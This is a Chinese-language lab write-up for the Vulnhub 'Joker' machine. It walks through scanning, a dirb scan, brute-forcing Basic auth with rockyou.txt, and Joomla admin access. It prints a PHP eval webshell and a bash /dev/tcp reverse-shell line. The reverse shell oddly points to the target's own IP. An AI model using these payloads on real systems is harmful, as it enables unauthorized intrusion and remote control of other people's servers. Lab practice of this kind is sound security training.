vulhub-joker攻略
靶场下载链接
https://download.vulnhub.com/ha/joker.zip
将kali和joker,桥接模式
获取靶场ip
arp-scan -l

使用nmap扫描
nmap -sS -sV -p-

访问80端口什么都没有发现

访问8080端口发现

用drib进行目录扫描
dirb "http://192.168.117.157" -X .txt,php,json,html

访问secret.txt发现

登录
使用登录,进行抓包
Authorization:后面的是账号密码的base64形式

发送到攻击器

打开kali自带字典,复制字典一部分,整个复制了最好
爆破时会用到
cd /usr/share/wordlists
sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
cat rockyou.txt

新建一个a.txt将字典复制的放入

爆破设置
2的时候从文件加载选择a.txt

点击攻击后得到密码
解码base64

成功登录

账号密码弱口令登录,尝试用joomla

点击Site Administrator
因为刚才的弱口令登录成功,所以这个的账号密码都是joomla

进去后点击Templates

木马
选择一个文件编辑

创建一个新文件编辑,写入一句话木马
点击左上角保存
<?php @eval($_POST["cmd"]);?>

蚁剑连接成功

反弹shell
再建立一个a.php
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.117.157/6666 0>&1'");?>

使用kali开启对6666端口的监听

访问http://192.168.117.157:8080/templates/beez3/html/a.php
kali收到监听消息,反弹shell结束

